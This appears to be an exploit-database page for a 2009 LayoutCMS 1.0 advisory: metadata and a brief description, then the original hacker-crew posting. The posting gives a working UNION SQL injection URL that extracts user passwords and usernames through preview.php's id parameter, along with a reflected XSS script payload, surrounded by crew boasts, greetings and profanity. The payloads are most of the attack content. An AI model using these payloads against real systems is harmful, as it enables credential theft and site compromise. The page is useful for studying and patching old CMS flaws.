header-logo
Suggest Exploit
vendor:
LayoutCMS
by:
./Red-D3v1L
8,8
CVSS
HIGH
SQL Injection and XSS
89, 79
CWE
Product Name: LayoutCMS
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:layoutcms:layoutcms:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

LayoutCMS 1.0 (SQL/XSS) Multiple Remote Vulnerabilities

An attacker can exploit the vulnerability by sending a malicious SQL query to the vulnerable parameter 'id' in the 'preview.php' page. An attacker can also exploit the XSS vulnerability by sending a malicious script to the vulnerable parameter 'id' in the 'preview.php' page.

Mitigation:

Input validation should be used to prevent SQL injection and XSS attacks.
Source

Exploit-DB raw data:

+===================================================================================+
            ./SEC-R1Z   _ __ _  _ _ _ ___ _ _ _ _   __  _ _ _ _ _           
            / /_ _ _ _ /   _ _\/   _ _ /\        \<   |/_ _ _ _ / 
            \ \_ _ _ _/  /___ /  /   __  |  |)   / |  |   /   /
             \_ _ _ _/  /___ /  /  | __ ||      /  |  |  /   /
              _______\  \_ _ \  \2_0_0_9 |      \  |  | /   /____
            /_ _ _ _ _\ _ _ _/\ _ _ _ /  |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
+===================================================================================+

    [?] ~ Note : sEc-r1z CrEw# r0x !
==============================================================================
    [?] LayoutCMS 1.0 (SQL/XSS) Multiple Remote Vulnerabilities
==============================================================================
    [?] My home:              [ http://sec-r1z.com ]
    [?] Script:               [ LayoutCMS 1.0 ]
    [?] Language:             [ PHP ]
    [?] Vendor                [http://layoutcms.com/]
    [?] Founder:              [ ./Red-D3v1L ]
    [?] Gr44tz to:            [ sec-r1z# Crew - Hackteach Team - My L0ve ~A~ ]
    [?] Fuck To :             [ Zombie_KsA << big big big L4m3r ] 
########################################################################
  
===[ Exploit SQL ]===
  
[»]Exploit : [Path]/preview.php?id=[inject c0dE]
 
[»]dem0: http://server/preview.php?id=-1+union+select+1,2,concat%28pass,0x3e,uname%29,4,5,6,7,8,9,10+from+layout_demo.users

[~] look For ThE Title xD


==============================================================================

===[ Exploit XSS ]===
  
[»]Exploit : [Path]/preview.php?id=[XSS Vuln]
 
[»]dem0: http://server/preview.php?id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

==============================================================================

#sEc-r1z.com Str1kEz y0u !